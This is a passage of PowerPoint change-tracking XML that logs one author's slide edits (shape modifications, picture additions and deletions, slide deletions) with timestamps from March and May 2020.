        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Joseph MacAdam" userId="bdcfcd3f-81bf-4584-8271-fe9093ebec4c" providerId="ADAL" clId="{D83D9A39-7DC8-4A37-B5D8-90780FDA7CAC}" dt="2020-03-18T14:28:31.650" v="1898" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="194211264" sldId="598"/>
            <ac:spMk id="3" creationId="{9FC8B5DB-6E54-4C75-99F7-D5B878084643}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="Joseph MacAdam" userId="bdcfcd3f-81bf-4584-8271-fe9093ebec4c" providerId="ADAL" clId="{D83D9A39-7DC8-4A37-B5D8-90780FDA7CAC}" dt="2020-03-18T14:29:11.227" v="1905" actId="14861"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="194211264" sldId="598"/>
            <ac:picMk id="4" creationId="{56F9EBE0-ED12-4BF3-BBFC-75C4A825001E}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="del">
          <ac:chgData name="Joseph MacAdam" userId="bdcfcd3f-81bf-4584-8271-fe9093ebec4c" providerId="ADAL" clId="{D83D9A39-7DC8-4A37-B5D8-90780FDA7CAC}" dt="2020-03-18T14:29:00.778" v="1899" actId="478"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="194211264" sldId="598"/>
            <ac:picMk id="5" creationId="{F102C1C0-5DFF-4897-A7F9-65DC410B76A0}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp">
        <pc:chgData name="Joseph MacAdam" userId="bdcfcd3f-81bf-4584-8271-fe9093ebec4c" providerId="ADAL" clId="{D83D9A39-7DC8-4A37-B5D8-90780FDA7CAC}" dt="2020-03-18T14:32:43.475" v="2078" actId="14861"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="817173972" sldId="599"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Joseph MacAdam" userId="bdcfcd3f-81bf-4584-8271-fe9093ebec4c" providerId="ADAL" clId="{D83D9A39-7DC8-4A37-B5D8-90780FDA7CAC}" dt="2020-03-18T14:31:41.114" v="2071" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="817173972" sldId="599"/>
            <ac:spMk id="3" creationId="{638581EA-3118-4B8A-A0C7-3137DD641733}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="Joseph MacAdam" userId="bdcfcd3f-81bf-4584-8271-fe9093ebec4c" providerId="ADAL" clId="{D83D9A39-7DC8-4A37-B5D8-90780FDA7CAC}" dt="2020-03-18T14:32:43.475" v="2078" actId="14861"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="817173972" sldId="599"/>
            <ac:picMk id="4" creationId="{1D1B25BF-AB50-46BA-A507-9EE6F4A6A6A5}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="del">
          <ac:chgData name="Joseph MacAdam" userId="bdcfcd3f-81bf-4584-8271-fe9093ebec4c" providerId="ADAL" clId="{D83D9A39-7DC8-4A37-B5D8-90780FDA7CAC}" dt="2020-03-18T14:29:42.857" v="1928" actId="478"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="817173972" sldId="599"/>
            <ac:picMk id="5" creationId="{B0A03EA9-C21E-4CB5-B0B3-4ED3277D1336}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="del">
        <pc:chgData name="Joseph MacAdam" userId="bdcfcd3f-81bf-4584-8271-fe9093ebec4c" providerId="ADAL" clId="{D83D9A39-7DC8-4A37-B5D8-90780FDA7CAC}" dt="2020-03-18T14:42:19.158" v="2680" actId="2696"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="904304897" sldId="604"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp">
        <pc:chgData name="Joseph MacAdam" userId="bdcfcd3f-81bf-4584-8271-fe9093ebec4c" providerId="ADAL" clId="{D83D9A39-7DC8-4A37-B5D8-90780FDA7CAC}" dt="2020-03-18T14:41:27.467" v="2679" actId="14861"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2660421503" sldId="605"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Joseph MacAdam" userId="bdcfcd3f-81bf-4584-8271-fe9093ebec4c" providerId="ADAL" clId="{D83D9A39-7DC8-4A37-B5D8-90780FDA7CAC}" dt="2020-03-18T14:41:02.387" v="2673" actId="5793"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2660421503" sldId="605"/>
            <ac:spMk id="3" creationId="{19FD4F39-2C49-45C8-8E4D-4E928B3A2588}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="Joseph MacAdam" userId="bdcfcd3f-81bf-4584-8271-fe9093ebec4c" providerId="ADAL" clId="{D83D9A39-7DC8-4A37-B5D8-90780FDA7CAC}" dt="2020-03-18T14:41:27.467" v="2679" actId="14861"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2660421503" sldId="605"/>
            <ac:picMk id="4" creationId="{F2679E92-DBA6-43B7-8C00-41A1DF10BC28}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="del">
          <ac:chgData name="Joseph MacAdam" userId="bdcfcd3f-81bf-4584-8271-fe9093ebec4c" providerId="ADAL" clId="{D83D9A39-7DC8-4A37-B5D8-90780FDA7CAC}" dt="2020-03-18T14:40:01.977" v="2544" actId="478"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2660421503" sldId="605"/>
            <ac:picMk id="6" creationId="{C347B672-BEB8-4D38-B496-AAB7852F8125}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp add del">
        <pc:chgData name="Joseph MacAdam" userId="bdcfcd3f-81bf-4584-8271-fe9093ebec4c" providerId="ADAL" clId="{D83D9A39-7DC8-4A37-B5D8-90780FDA7CAC}" dt="2020-03-18T14:45:27.837" v="2925" actId="2696"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="841969414" sldId="606"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Joseph MacAdam" userId="bdcfcd3f-81bf-4584-8271-fe9093ebec4c" providerId="ADAL" clId="{D83D9A39-7DC8-4A37-B5D8-90780FDA7CAC}" dt="2020-03-18T14:13:30.735" v="1037" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="841969414" sldId="606"/>
            <ac:spMk id="2" creationId="{E0E7E501-C2CD-42FD-BCAD-E4A3E6159277}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Joseph MacAdam" userId="bdcfcd3f-81bf-4584-8271-fe9093ebec4c" providerId="ADAL" clId="{D83D9A39-7DC8-4A37-B5D8-90780FDA7CAC}" dt="2020-03-18T14:15:31.949" v="1162" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="841969414" sldId="606"/>
            <ac:spMk id="3" creationId="{4BDDE3EC-F076-499C-96A3-50D98C09FDD7}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp modSp add">
        <pc:chgData name="Joseph MacAdam" userId="bdcfcd3f-81bf-4584-8271-fe9093ebec4c" providerId="ADAL" clId="{D83D9A39-7DC8-4A37-B5D8-90780FDA7CAC}" dt="2020-03-18T14:20:52.822" v="1373" actId="403"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2574180667" sldId="607"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Joseph MacAdam" userId="bdcfcd3f-81bf-4584-8271-fe9093ebec4c" providerId="ADAL" clId="{D83D9A39-7DC8-4A37-B5D8-90780FDA7CAC}" dt="2020-03-18T14:20:52.822" v="1373" actId="403"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2574180667" sldId="607"/>
            <ac:spMk id="3" creationId="{4BDDE3EC-F076-499C-96A3-50D98C09FDD7}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="Joseph MacAdam" userId="bdcfcd3f-81bf-4584-8271-fe9093ebec4c" providerId="ADAL" clId="{D83D9A39-7DC8-4A37-B5D8-90780FDA7CAC}" dt="2020-03-18T14:20:26.876" v="1367" actId="14861"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2574180667" sldId="607"/>
            <ac:picMk id="4" creationId="{BC2D14DB-1018-4381-983D-92B208330E14}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp modSp add">
        <pc:chgData name="Joseph MacAdam" userId="bdcfcd3f-81bf-4584-8271-fe9093ebec4c" providerId="ADAL" clId="{D83D9A39-7DC8-4A37-B5D8-90780FDA7CAC}" dt="2020-03-18T14:27:04.181" v="1867" actId="122"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2519246022" sldId="608"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Joseph MacAdam" userId="bdcfcd3f-81bf-4584-8271-fe9093ebec4c" providerId="ADAL" clId="{D83D9A39-7DC8-4A37-B5D8-90780FDA7CAC}" dt="2020-03-18T14:21:05.027" v="1397" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2519246022" sldId="608"/>
            <ac:spMk id="2" creationId="{8B1F0978-A220-4946-8FE2-3084E34328E3}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Joseph MacAdam" userId="bdcfcd3f-81bf-4584-8271-fe9093ebec4c" providerId="ADAL" clId="{D83D9A39-7DC8-4A37-B5D8-90780FDA7CAC}" dt="2020-03-18T14:27:04.181" v="1867" actId="122"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2519246022" sldId="608"/>
            <ac:spMk id="3" creationId="{87D01887-F3B1-4A8B-A7AA-C39393927F5A}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="Joseph MacAdam" userId="bdcfcd3f-81bf-4584-8271-fe9093ebec4c" providerId="ADAL" clId="{D83D9A39-7DC8-4A37-B5D8-90780FDA7CAC}" dt="2020-03-18T14:26:14.732" v="1750" actId="14861"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2519246022" sldId="608"/>
            <ac:picMk id="4" creationId="{577ABE77-D6CD-4090-8BA1-2117777D412C}"/>
          </ac:picMkLst>
        </pc:pic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bdcfcd3f-81bf-4584-8271-fe9093ebec4c" providerId="ADAL" clId="{58D0845A-4028-4F37-B968-7FEEA2C18C62}"/>
    <pc:docChg chg="delSld modSld">
      <pc:chgData name="Joseph MacAdam" userId="bdcfcd3f-81bf-4584-8271-fe9093ebec4c" providerId="ADAL" clId="{58D0845A-4028-4F37-B968-7FEEA2C18C62}" dt="2020-05-29T17:54:26.440" v="2" actId="2696"/>
      <pc:docMkLst>
        <pc:docMk/>
      </pc:docMkLst>
      <pc:sldChg chg="modSp">
        <pc:chgData name="Joseph MacAdam" userId="bdcfcd3f-81bf-4584-8271-fe9093ebec4c" providerId="ADAL" clId="{58D0845A-4028-4F37-B968-7FEEA2C18C62}" dt="2020-05-29T13:51:41.102" v="1" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="0" sldId="256"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Joseph MacAdam" userId="bdcfcd3f-81bf-4584-8271-fe9093ebec4c" providerId="ADAL" clId="{58D0845A-4028-4F37-B968-7FEEA2C18C62}" dt="2020-05-29T13:51:41.102" v="1" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="0" sldId="256"/>
            <ac:spMk id="130" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="del">
        <pc:chgData name="Joseph MacAdam" userId="bdcfcd3f-81bf-4584-8271-fe9093ebec4c" providerId="ADAL" clId="{58D0845A-4028-4F37-B968-7FEEA2C18C62}" dt="2020-05-29T17:54:26.440" v="2" actId="2696"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2574180667" sldId="607"/>
        </pc:sldMkLst>
      </pc:sldChg>
    </pc:docChg>
  </pc:docChgLst>
  <pc:docChgLst>
    <pc:chgData name="Joseph MacAdam" userId="bdcfcd3f-81bf-4584-8271-fe9093ebec4c" providerId="ADAL" clId="{E572F781-2295-4407-BCDE-CA9AD19CC785}"/>
    <pc:docChg chg="undo custSel delSld modSld">
      <pc:chgData name="Joseph MacAdam" userId="bdcfcd3f-81bf-4584-8271-fe9093ebec4c" providerId="ADAL" clId="{E572F781-2295-4407-BCDE-CA9AD19CC785}" dt="2020-03-17T15:59:25.558" v="3905" actId="14861"/>
      <pc:docMkLst>
        <pc:docMk/>
      </pc:docMkLst>
      <pc:sldChg chg="modSp">
        <pc:chgData name="Joseph MacAdam" userId="bdcfcd3f-81bf-4584-8271-fe9093ebec4c" providerId="ADAL" clId="{E572F781-2295-4407-BCDE-CA9AD19CC785}" dt="2020-03-17T15:01:12.031" v="53" actId="14100"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="0" sldId="256"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Joseph MacAdam" userId="bdcfcd3f-81bf-4584-8271-fe9093ebec4c" providerId="ADAL" clId="{E572F781-2295-4407-BCDE-CA9AD19CC785}" dt="2020-03-17T15:01:12.031" v="53" actId="14100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E572F781-2295-4407-BCDE-CA9AD19CC785}" dt="2020-03-17T15:01:08.393" v="52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E572F781-2295-4407-BCDE-CA9AD19CC785}" dt="2020-03-17T15:02:00.449" v="163" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="34493695" sldId="588"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Joseph MacAdam" userId="bdcfcd3f-81bf-4584-8271-fe9093ebec4c" providerId="ADAL" clId="{E572F781-2295-4407-BCDE-CA9AD19CC785}" dt="2020-03-17T15:01:26.937" v="64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E572F781-2295-4407-BCDE-CA9AD19CC785}" dt="2020-03-17T15:02:00.449" v="163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E572F781-2295-4407-BCDE-CA9AD19CC785}" dt="2020-03-17T15:56:13.836" v="3728" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="309114280" sldId="589"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Joseph MacAdam" userId="bdcfcd3f-81bf-4584-8271-fe9093ebec4c" providerId="ADAL" clId="{E572F781-2295-4407-BCDE-CA9AD19CC785}" dt="2020-03-17T15:56:13.836" v="3728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E572F781-2295-4407-BCDE-CA9AD19CC785}" dt="2020-03-17T15:50:18.717" v="3138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E572F781-2295-4407-BCDE-CA9AD19CC785}" dt="2020-03-17T15:05:17.842" v="355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E572F781-2295-4407-BCDE-CA9AD19CC785}" dt="2020-03-17T15:05:17.842" v="355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E572F781-2295-4407-BCDE-CA9AD19CC785}" dt="2020-03-17T15:47:39.562" v="2788" actId="2696"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3957164049" sldId="591"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp modNotesTx">
        <pc:chgData name="Joseph MacAdam" userId="bdcfcd3f-81bf-4584-8271-fe9093ebec4c" providerId="ADAL" clId="{E572F781-2295-4407-BCDE-CA9AD19CC785}" dt="2020-03-17T15:57:44.595" v="3769" actId="1076"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3392114702" sldId="592"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Joseph MacAdam" userId="bdcfcd3f-81bf-4584-8271-fe9093ebec4c" providerId="ADAL" clId="{E572F781-2295-4407-BCDE-CA9AD19CC785}" dt="2020-03-17T15:06:01.417" v="366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E572F781-2295-4407-BCDE-CA9AD19CC785}" dt="2020-03-17T15:08:41.552" v="478" actId="14100"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3392114702" sldId="592"/>
            <ac:spMk id="3" creationId="{FF20D8FE-5958-4695-9408-98B27A546595}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="del mod">
          <ac:chgData name="Joseph MacAdam" userId="bdcfcd3f-81bf-4584-8271-fe9093ebec4c" providerId="ADAL" clId="{E572F781-2295-4407-BCDE-CA9AD19CC785}" dt="2020-03-17T15:07:21.756" v="473" actId="478"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3392114702" sldId="592"/>
            <ac:spMk id="5" creationId="{F85B9761-6D14-4981-A46A-24EE30F38C20}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Joseph MacAdam" userId="bdcfcd3f-81bf-4584-8271-fe9093ebec4c" providerId="ADAL" clId="{E572F781-2295-4407-BCDE-CA9AD19CC785}" dt="2020-03-17T15:56:58.724" v="3746" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3392114702" sldId="592"/>
            <ac:spMk id="7" creationId="{6CBB69CA-79CC-4FCF-96CA-435D992B974F}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Joseph MacAdam" userId="bdcfcd3f-81bf-4584-8271-fe9093ebec4c" providerId="ADAL" clId="{E572F781-2295-4407-BCDE-CA9AD19CC785}" dt="2020-03-17T15:57:23.028" v="3750" actId="14100"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3392114702" sldId="592"/>
            <ac:spMk id="8" creationId="{278DBB45-C4DC-49D4-9EC1-87F33ED14FB1}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="del">
          <ac:chgData name="Joseph MacAdam" userId="bdcfcd3f-81bf-4584-8271-fe9093ebec4c" providerId="ADAL" clId="{E572F781-2295-4407-BCDE-CA9AD19CC785}" dt="2020-03-17T15:06:03.895" v="367" actId="478"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3392114702" sldId="592"/>
            <ac:picMk id="4" creationId="{F0DC2F5C-9F0F-471A-8127-4863B30078DF}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="Joseph MacAdam" userId="bdcfcd3f-81bf-4584-8271-fe9093ebec4c" providerId="ADAL" clId="{E572F781-2295-4407-BCDE-CA9AD19CC785}" dt="2020-03-17T15:09:04.867" v="488" actId="692"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3392114702" sldId="592"/>
            <ac:picMk id="6" creationId="{DB74C842-5771-40A3-95F0-BC2635BE6D3B}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:cxnChg chg="add mod">
          <ac:chgData name="Joseph MacAdam" userId="bdcfcd3f-81bf-4584-8271-fe9093ebec4c" providerId="ADAL" clId="{E572F781-2295-4407-BCDE-CA9AD19CC785}" dt="2020-03-17T15:57:44.595" v="3769" actId="1076"/>
          <ac:cxnSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3392114702" sldId="592"/>
            <ac:cxnSpMk id="10" creationId="{BB767213-656F-4F80-B825-98451A6C4976}"/>
          </ac:cxnSpMkLst>
        </pc:cxnChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp modSp">
        <pc:chgData name="Joseph MacAdam" userId="bdcfcd3f-81bf-4584-8271-fe9093ebec4c" providerId="ADAL" clId="{E572F781-2295-4407-BCDE-CA9AD19CC785}" dt="2020-03-17T15:59:25.558" v="3905" actId="14861"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="186350803" sldId="593"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Joseph MacAdam" userId="bdcfcd3f-81bf-4584-8271-fe9093ebec4c" providerId="ADAL" clId="{E572F781-2295-4407-BCDE-CA9AD19CC785}" dt="2020-03-17T15:11:03.985" v="662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E572F781-2295-4407-BCDE-CA9AD19CC785}" dt="2020-03-17T15:58:37.988" v="3893" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="186350803" sldId="593"/>
            <ac:spMk id="3" creationId="{21C25B94-29D5-48B2-A6F8-F9E7433E2123}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="Joseph MacAdam" userId="bdcfcd3f-81bf-4584-8271-fe9093ebec4c" providerId="ADAL" clId="{E572F781-2295-4407-BCDE-CA9AD19CC785}" dt="2020-03-17T15:59:25.558" v="3905" actId="14861"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="186350803" sldId="593"/>
            <ac:picMk id="4" creationId="{55A47DB0-5A22-4D59-815A-44EB0DFCEF8A}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp">
        <pc:chgData name="Joseph MacAdam" userId="bdcfcd3f-81bf-4584-8271-fe9093ebec4c" providerId="ADAL" clId="{E572F781-2295-4407-BCDE-CA9AD19CC785}" dt="2020-03-17T15:27:31.019" v="1304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E572F781-2295-4407-BCDE-CA9AD19CC785}" dt="2020-03-17T15:27:31.019" v="1304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E572F781-2295-4407-BCDE-CA9AD19CC785}" dt="2020-03-17T15:11:43.053" v="726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addSp delSp modSp">
        <pc:chgData name="Joseph MacAdam" userId="bdcfcd3f-81bf-4584-8271-fe9093ebec4c" providerId="ADAL" clId="{E572F781-2295-4407-BCDE-CA9AD19CC785}" dt="2020-03-17T15:40:55.576" v="2375" actId="1076"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="4139910246" sldId="596"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Joseph MacAdam" userId="bdcfcd3f-81bf-4584-8271-fe9093ebec4c" providerId="ADAL" clId="{E572F781-2295-4407-BCDE-CA9AD19CC785}" dt="2020-03-17T15:34:54.832" v="1894" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4139910246" sldId="596"/>
            <ac:spMk id="2" creationId="{3E0F3E90-FDE5-43CB-B57A-50251D286DED}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Joseph MacAdam" userId="bdcfcd3f-81bf-4584-8271-fe9093ebec4c" providerId="ADAL" clId="{E572F781-2295-4407-BCDE-CA9AD19CC785}" dt="2020-03-17T15:40:55.576" v="2375" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4139910246" sldId="596"/>
            <ac:spMk id="3" creationId="{841EC8F2-047F-462B-BD45-4A942779A077}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="del">
          <ac:chgData name="Joseph MacAdam" userId="bdcfcd3f-81bf-4584-8271-fe9093ebec4c" providerId="ADAL" clId="{E572F781-2295-4407-BCDE-CA9AD19CC785}" dt="2020-03-17T15:34:56.679" v="1895" actId="478"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4139910246" sldId="596"/>
            <ac:picMk id="4" creationId="{76F9D023-7903-4744-B5AA-A7C079A8A42C}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="Joseph MacAdam" userId="bdcfcd3f-81bf-4584-8271-fe9093ebec4c" providerId="ADAL" clId="{E572F781-2295-4407-BCDE-CA9AD19CC785}" dt="2020-03-17T15:39:25.626" v="2294" actId="14861"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4139910246" sldId="596"/>
            <ac:picMk id="5" creationId="{21C62EC2-8CA2-4E21-839B-C6F9BB549778}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp">
        <pc:chgData name="Joseph MacAdam" userId="bdcfcd3f-81bf-4584-8271-fe9093ebec4c" providerId="ADAL" clId="{E572F781-2295-4407-BCDE-CA9AD19CC785}" dt="2020-03-17T15:26:11.244" v="1303" actId="692"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="194211264" sldId="598"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Joseph MacAdam" userId="bdcfcd3f-81bf-4584-8271-fe9093ebec4c" providerId="ADAL" clId="{E572F781-2295-4407-BCDE-CA9AD19CC785}" dt="2020-03-17T15:13:11.948" v="863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E572F781-2295-4407-BCDE-CA9AD19CC785}" dt="2020-03-17T15:23:57.623" v="1292" actId="14100"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="194211264" sldId="598"/>
            <ac:spMk id="3" creationId="{9FC8B5DB-6E54-4C75-99F7-D5B878084643}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="del">
          <ac:chgData name="Joseph MacAdam" userId="bdcfcd3f-81bf-4584-8271-fe9093ebec4c" providerId="ADAL" clId="{E572F781-2295-4407-BCDE-CA9AD19CC785}" dt="2020-03-17T15:12:13.224" v="789" actId="478"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="194211264" sldId="598"/>
            <ac:picMk id="4" creationId="{0BD582D4-4988-45F4-BC3B-C52B6B8321F2}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="Joseph MacAdam" userId="bdcfcd3f-81bf-4584-8271-fe9093ebec4c" providerId="ADAL" clId="{E572F781-2295-4407-BCDE-CA9AD19CC785}" dt="2020-03-17T15:26:11.244" v="1303" actId="692"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="194211264" sldId="598"/>
            <ac:picMk id="5" creationId="{F102C1C0-5DFF-4897-A7F9-65DC410B76A0}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp">
        <pc:chgData name="Joseph MacAdam" userId="bdcfcd3f-81bf-4584-8271-fe9093ebec4c" providerId="ADAL" clId="{E572F781-2295-4407-BCDE-CA9AD19CC785}" dt="2020-03-17T15:51:25.397" v="3251" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="817173972" sldId="599"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Joseph MacAdam" userId="bdcfcd3f-81bf-4584-8271-fe9093ebec4c" providerId="ADAL" clId="{E572F781-2295-4407-BCDE-CA9AD19CC785}" dt="2020-03-17T15:28:13.912" v="1321" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="817173972" sldId="599"/>
            <ac:spMk id="2" creationId="{24B2FCDB-2B12-4013-8160-C92D0F5D2AF7}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Joseph MacAdam" userId="bdcfcd3f-81bf-4584-8271-fe9093ebec4c" providerId="ADAL" clId="{E572F781-2295-4407-BCDE-CA9AD19CC785}" dt="2020-03-17T15:51:25.397" v="3251" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="817173972" sldId="599"/>
            <ac:spMk id="3" creationId="{638581EA-3118-4B8A-A0C7-3137DD641733}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="add del">
          <ac:chgData name="Joseph MacAdam" userId="bdcfcd3f-81bf-4584-8271-fe9093ebec4c" providerId="ADAL" clId="{E572F781-2295-4407-BCDE-CA9AD19CC785}" dt="2020-03-17T15:32:18.599" v="1846" actId="478"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="817173972" sldId="599"/>
            <ac:picMk id="4" creationId="{061F3446-3358-4CAF-9569-8D3CE779DF03}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="Joseph MacAdam" userId="bdcfcd3f-81bf-4584-8271-fe9093ebec4c" providerId="ADAL" clId="{E572F781-2295-4407-BCDE-CA9AD19CC785}" dt="2020-03-17T15:32:42.594" v="1861" actId="692"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="817173972" sldId="599"/>
            <ac:picMk id="5" creationId="{B0A03EA9-C21E-4CB5-B0B3-4ED3277D1336}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="del">
        <pc:chgData name="Joseph MacAdam" userId="bdcfcd3f-81bf-4584-8271-fe9093ebec4c" providerId="ADAL" clId="{E572F781-2295-4407-BCDE-CA9AD19CC785}" dt="2020-03-17T15:47:40.228" v="2789" actId="2696"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="502917719" sldId="603"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp">
